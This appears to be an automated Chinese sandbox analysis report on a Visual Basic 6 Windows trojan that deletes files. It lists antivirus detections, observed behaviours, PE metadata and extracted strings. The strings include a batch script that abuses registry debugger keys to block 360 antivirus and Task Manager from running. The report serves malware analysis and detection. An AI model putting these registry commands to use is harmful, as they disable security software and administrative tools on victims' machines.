3.0
中危
DACN
0.14
FACILE
1.00
IMCLNet
0.72
MFGraph
0.00
反病毒引擎
| 查杀引擎 | 查杀结果 | 查杀时间 | 查杀版本 |
|---|---|---|---|
| Alibaba | Worm:Win32/Fsysna.1810d8c0 | 20190527 | 0.3.0.5 |
| Avast | Win32:Malware-gen | 20191117 | 18.4.3895.0 |
| Baidu | None | 20190318 | 1.0.0.2 |
| CrowdStrike | win/malicious_confidence_100% (W) | 20190702 | 1.0 |
| Kingsoft | None | 20191117 | 2013.8.14.323 |
| McAfee | Trojan-FQXU!D64E03EE55C8 | 20191113 | 6.0.6.653 |
| Tencent | None | 20191117 | 1.0.0.1 |
静态指标
观察到命令行控制台输出
(3 个事件)
一个或多个进程崩溃
(50 out of 826 个事件)
动态指标
在 PE 资源中识别到外语
(1 个事件)
| name | RT_VERSION | language | LANG_CHINESE | filetype | None | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0000a9a4 | size | 0x0000024c | ||||||||||||||||||
在文件系统上创建可执行文件
(50 out of 59 个事件)
| file | c:\gcoxh\bin\inject-x64.exe |
| file | c:\Program Files (x86)\360\360TptMon\Uninstall.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\pingsender.exe |
| file | c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe |
| file | c:\dieweijdvm\bin\is32bit.exe |
| file | c:\Python27\Scripts\easy_install.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\ScriptExecute.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\plugin-container.exe |
| file | c:\dieweijdvm\bin\execsc.exe |
| file | c:\gcoxh\bin\Procmon.exe |
| file | c:\Python27\Lib\distutils\command\wininst-8.0.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\feedback\360ScreenCapture.exe |
| file | c:\dieweijdvm\bin\inject-x64.exe |
| file | c:\Program Files (x86)\360\360TptMon\feedback\360ScreenCapture.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\crashreporter.exe |
| file | c:\Python27\Lib\site-packages\setuptools\cli-32.exe |
| file | c:\gcoxh\bin\execsc.exe |
| file | c:\Python27\Lib\site-packages\setuptools\gui.exe |
| file | c:\Python27\Lib\distutils\command\wininst-9.0-amd64.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe |
| file | c:\Python27\Scripts\pip.exe |
| file | c:\Python27\Lib\site-packages\setuptools\gui-32.exe |
| file | c:\gcoxh\bin\is32bit.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\t64.exe |
| file | c:\Program Files (x86)\360\360TptMon\InstallTMDB64.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe |
| file | c:\dieweijdvm\bin\Procmon.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\LiveUpdate360.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\updater.exe |
| file | c:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\DrvInst64.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe |
| file | c:\Python27\Scripts\easy_install-2.7.exe |
| file | c:\Python27\Scripts\pip2.7.exe |
| file | c:\Python27\Lib\distutils\command\wininst-7.1.exe |
| file | c:\Program Files (x86)\360\360TptMon\InstallTMDB.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\w64.exe |
| file | c:\Python27\Scripts\pip2.exe |
| file | c:\Program Files (x86)\360\360TptMon\feedback\TptMonFeedBack.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\drv_uninst.exe |
| file | c:\gcoxh\bin\inject-x86.exe |
| file | c:\install.exe |
| file | c:\Python27\python.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\firefox.exe |
| file | c:\Python27\Lib\site-packages\setuptools\cli-64.exe |
创建指向可执行文件的快捷方式
(6 个事件)
| file | c:\Users\Administrator\Links\Downloads.lnk |
| file | c:\Users\tu\Links\RecentPlaces.lnk |
| file | c:\Users\Administrator\Links\Desktop.lnk |
| file | c:\Users\tu\Links\Desktop.lnk |
| file | c:\Users\tu\Links\Downloads.lnk |
| file | c:\Users\Administrator\Links\RecentPlaces.lnk |
创建可疑进程
(1 个事件)
| cmdline | cmd.exe |
将读写内存保护更改为可读执行(可能是为了避免在同时设置所有 RWX 标志时被检测)
(2 个事件)
网络通信
与未执行 DNS 查询的主机进行通信
(1 个事件)
| host | 114.114.114.114 | |||
通过文件的存在尝试检测Cuckoo Sandbox
(3 个事件)
| file | c:\Python27\agent.py |
| file | c:\dieweijdvm\analyzer.py |
| file | c:\gcoxh\analyzer.py |
附加已知 multi-family 勒索软件文件扩展名到已加密的文件
(50 out of 78 个事件)
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-4.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\jis0212.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macUkraine.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\shiftjis.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1256.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp860.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1257.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\ebcdic.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp932.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp864.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp855.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1253.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp863.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-13.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-14.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\symbol.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\euc-jp.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\koi8-u.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macIceland.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-16.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp869.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1251.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\tis-620.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp865.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp949.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macJapan.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macTurkish.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1258.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macCyrillic.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macCentEuro.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp857.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macCroatian.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-6.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macRomania.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\ksc5601.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\ascii.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\iso8859-1.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1252.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp874.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\euc-kr.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp437.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp1254.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\macRoman.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp850.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\big5.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp866.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\cp936.enc |
| file | c:\Python27\tcl\tcl8.5\encoding\dingbats.enc |
从系统中删除大量文件,表明 ransomware、清除恶意软件或系统破坏
(50 out of 128 个事件)
| file | c:\gcoxh\bin\inject-x64.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\plugin-container.exe |
| file | c:\Windows\notepad.exe |
| file | c:\Program Files (x86)\Windows Media Player\WMPDMC.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\360DrvMgr.exe |
| file | c:\Program Files (x86)\Windows Media Player\wmpconfig.exe |
| file | c:\Program Files\Internet Explorer\iexplore.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\feedback\360ScreenCapture.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe |
| file | c:\Program Files (x86)\360\360TptMon\360TptMon.exe |
| file | c:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
| file | c:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe |
| file | c:\Program Files\Internet Explorer\ieinstal.exe |
| file | c:\Program Files (x86)\Internet Explorer\iexplore.exe |
| file | c:\Python27\Scripts\pip.exe |
| file | c:\Program Files (x86)\Windows Media Player\wmpenc.exe |
| file | c:\Program Files\Windows Photo Viewer\ImagingDevices.exe |
| file | c:\Python27\Lib\site-packages\setuptools\gui-32.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\t64.exe |
| file | c:\Program Files (x86)\360\360TptMon\InstallTMDB64.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\updater.exe |
| file | c:\Program Files (x86)\Windows Media Player\wmplayer.exe |
| file | c:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe |
| file | c:\Program Files (x86)\360\360DrvMgr\DrvInst64.exe |
| file | c:\Python27\Scripts\pip2.7.exe |
| file | c:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe |
| file | c:\Python27\Lib\site-packages\setuptools\cli-64.exe |
| file | c:\Program Files\Windows Media Player\wmprph.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\firefox.exe |
| file | c:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe |
| file | c:\Program Files\Windows Defender\MSASCui.exe |
| file | c:\Program Files\DVD Maker\DVDMaker.exe |
| file | c:\Program Files\Windows Media Player\wmpnscfg.exe |
| file | c:\Python27\Lib\distutils\command\wininst-6.0.exe |
| file | c:\dieweijdvm\bin\is32bit.exe |
| file | c:\dieweijdvm\bin\execsc.exe |
| file | c:\Program Files\Windows Mail\wab.exe |
| file | c:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| file | c:\Program Files\Windows Media Player\WMPDMC.exe |
| file | c:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
| file | c:\Windows\fveupdate.exe |
| file | c:\Program Files\Windows Media Player\wmplayer.exe |
| file | c:\Program Files (x86)\360\360TptMon\feedback\360ScreenCapture.exe |
| file | c:\Python27\Lib\distutils\command\wininst-9.0-amd64.exe |
| file | c:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe |
| file | c:\gcoxh\bin\is32bit.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe |
| file | c:\Python27\Scripts\easy_install-2.7.exe |
| file | c:\Program Files (x86)\Windows Media Player\wmprph.exe |
| file | c:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe |
文件已被 VirusTotal 上 60 个反病毒引擎识别为恶意
(50 out of 60 个事件)
| ALYac | Trojan.Agent.DVQW |
| APEX | Malicious |
| AVG | Win32:Malware-gen |
| Acronis | suspicious |
| Ad-Aware | Trojan.Agent.DVQW |
| AhnLab-V3 | Trojan/Win32.Fsysna.R269415 |
| Alibaba | Worm:Win32/Fsysna.1810d8c0 |
| Antiy-AVL | Trojan/Win32.Fsysna.FCCR |
| Arcabit | Trojan.Agent.DVQW |
| Avast | Win32:Malware-gen |
| Avira | TR/Dropper.Gen |
| BitDefender | Trojan.Agent.DVQW |
| BitDefenderTheta | Gen:Trojan.Heur.VP.yn3@aSSeDjob |
| CAT-QuickHeal | Trojan.FsysnaVMF.S7094755 |
| Comodo | Worm.Win32.KillFiles.A@8dwp4w |
| CrowdStrike | win/malicious_confidence_100% (W) |
| Cybereason | malicious.e55c8f |
| Cylance | Unsafe |
| Cyren | W32/Fsysna.E.gen!Eldorado |
| DrWeb | Trojan.KillFiles.64121 |
| ESET-NOD32 | Win32/KillFiles.A |
| Emsisoft | Trojan.Agent.DVQW (B) |
| Endgame | malicious (high confidence) |
| F-Prot | W32/Fsysna.E.gen!Eldorado |
| F-Secure | Trojan.TR/Dropper.Gen |
| FireEye | Generic.mg.d64e03ee55c8f294 |
| Fortinet | W32/Fsysna.FCCR!tr |
| GData | Trojan.Agent.DVQW |
| Ikarus | Trojan.Agent |
| Invincea | heuristic |
| Jiangmin | Trojan.Fsysna.kfk |
| K7AntiVirus | Trojan ( 0000bbc81 ) |
| K7GW | Trojan ( 0000bbc81 ) |
| Kaspersky | Trojan.Win32.Fsysna.fcpq |
| Lionic | Trojan.Win32.Fsysna.tpPg |
| MAX | malware (ai score=84) |
| Malwarebytes | Hijack.AssocExt |
| McAfee | Trojan-FQXU!D64E03EE55C8 |
| McAfee-GW-Edition | BehavesLike.Win32.Autorun.tm |
| MicroWorld-eScan | Trojan.Agent.DVQW |
| Microsoft | Trojan:Win32/Musecador.V!MTB |
| NANO-Antivirus | Trojan.Win32.Fsysna.fpivmo |
| Paloalto | generic.ml |
| Panda | Trj/Genetic.gen |
| Qihoo-360 | Win32/Harm.XiaoHao.F |
| Rising | Worm.KillFile!1.B91B (CLASSIC) |
| SentinelOne | DFI - Malicious PE |
| Sophos | Troj/VB-KNV |
| Symantec | Trojan Horse |
| TACHYON | Trojan/W32.VB-Fsysna.Zen |
二进制图像
288x288
224x224
192x192
160x160
128x128
96x96
64x64
32x32
运行截图
暂无运行截图
该样本运行过程中未生成截图
PE Compile Time
2019-04-20 18:22:04
PE Imphash
d2bf2bc66c5e49a85254cd29b19046bd
Sections
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00001000 | 0x00007df0 | 0x00008000 | 6.058616924670466 |
| .data | 0x00009000 | 0x00000b40 | 0x00001000 | 0.0 |
| .rsrc | 0x0000a000 | 0x00001000 | 0x00001000 | 4.416328167746471 |
Resources
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_ICON | 0x0000a0e8 | 0x000008a8 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_GROUP_ICON | 0x0000a990 | 0x00000014 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_VERSION | 0x0000a9a4 | 0x0000024c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | None |
Imports
Library MSVBVM60.DLL:
• 0x401000 _CIcos
• 0x401004 _adj_fptan
• 0x401008 __vbaStrI4
• 0x40100c __vbaVarMove
• 0x401010 __vbaAryMove
• 0x401014 __vbaFreeVar
• 0x401018 __vbaStrVarMove
• 0x40101c __vbaLenBstr
• 0x401020 __vbaFreeVarList
• 0x401024 __vbaEnd
• 0x401028 _adj_fdiv_m64
• 0x40102c __vbaFreeObjList
• 0x401030 _adj_fprem1
• 0x401034 __vbaStrCat
• 0x401038 __vbaError
• 0x40103c __vbaSetSystemError
• 0x401040 __vbaHresultCheckObj
• 0x401044 _adj_fdiv_m32
• 0x401048 __vbaAryDestruct
• 0x40104c __vbaExitProc
• 0x401050 __vbaVarForInit
• 0x401054 None
• 0x401058 None
• 0x40105c __vbaObjSet
• 0x401060 __vbaOnError
• 0x401064 _adj_fdiv_m16i
• 0x401068 _adj_fdivr_m16i
• 0x40106c None
• 0x401070 _CIsin
• 0x401074 __vbaErase
• 0x401078 __vbaChkstk
• 0x40107c __vbaGosubFree
• 0x401080 __vbaFileClose
• 0x401084 EVENT_SINK_AddRef
• 0x401088 __vbaGenerateBoundsError
• 0x40108c None
• 0x401090 __vbaAryConstruct2
• 0x401094 __vbaPutOwner4
• 0x401098 __vbaI2I4
• 0x40109c DllFunctionCall
• 0x4010a0 __vbaFpUI1
• 0x4010a4 __vbaRedimPreserve
• 0x4010a8 __vbaStrR4
• 0x4010ac _adj_fpatan
• 0x4010b0 __vbaFixstrConstruct
• 0x4010b4 None
• 0x4010b8 __vbaRedim
• 0x4010bc EVENT_SINK_Release
• 0x4010c0 __vbaNew
• 0x4010c4 None
• 0x4010c8 __vbaUI1I2
• 0x4010cc _CIsqrt
• 0x4010d0 EVENT_SINK_QueryInterface
• 0x4010d4 __vbaUI1I4
• 0x4010d8 __vbaExceptHandler
• 0x4010dc __vbaPrintFile
• 0x4010e0 __vbaStrToUnicode
• 0x4010e4 None
• 0x4010e8 _adj_fprem
• 0x4010ec _adj_fdivr_m64
• 0x4010f0 __vbaGosub
• 0x4010f4 None
• 0x4010f8 __vbaFPException
• 0x4010fc None
• 0x401100 __vbaGetOwner3
• 0x401104 __vbaStrVarVal
• 0x401108 __vbaVarCat
• 0x40110c __vbaGetOwner4
• 0x401110 __vbaI2Var
• 0x401114 __vbaLsetFixstrFree
• 0x401118 None
• 0x40111c _CIlog
• 0x401120 __vbaErrorOverflow
• 0x401124 __vbaFileOpen
• 0x401128 __vbaVar2Vec
• 0x40112c __vbaNew2
• 0x401130 None
• 0x401134 None
• 0x401138 None
• 0x40113c _adj_fdiv_m32i
• 0x401140 _adj_fdivr_m32i
• 0x401144 None
• 0x401148 __vbaStrCopy
• 0x40114c __vbaVarSetObj
• 0x401150 __vbaFreeStrList
• 0x401154 __vbaDerefAry1
• 0x401158 _adj_fdivr_m32
• 0x40115c _adj_fdiv_r
• 0x401160 None
• 0x401164 None
• 0x401168 __vbaVarTstNe
• 0x40116c None
• 0x401170 __vbaI4Var
• 0x401174 __vbaVarAdd
• 0x401178 __vbaAryLock
• 0x40117c __vbaVarDup
• 0x401180 __vbaStrToAnsi
• 0x401184 __vbaVarLateMemCallLd
• 0x401188 __vbaFpI4
• 0x40118c __vbaVarCopy
• 0x401190 None
• 0x401194 __vbaVarSetObjAddref
• 0x401198 _CIatan
• 0x40119c __vbaStrMove
• 0x4011a0 __vbaStrVarCopy
• 0x4011a4 _allmul
• 0x4011a8 __vbaLenVarB
• 0x4011ac _CItan
• 0x4011b0 __vbaAryUnlock
• 0x4011b4 __vbaFPInt
• 0x4011b8 __vbaVarForNext
• 0x4011bc _CIexp
• 0x4011c0 __vbaFreeStr
• 0x4011c4 __vbaFreeObj
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlr r
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE| }P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
3964344A5F101BBA10AF84388155DFBD
1FD3607D4327B50EB6EDDABE78C6FA87
D1B2D8671EFC317E434137437EEF4A96
370027142FF336DDB2EE9E351C47EDA5
D47BD13313C220FC81E2540FDD038E6A
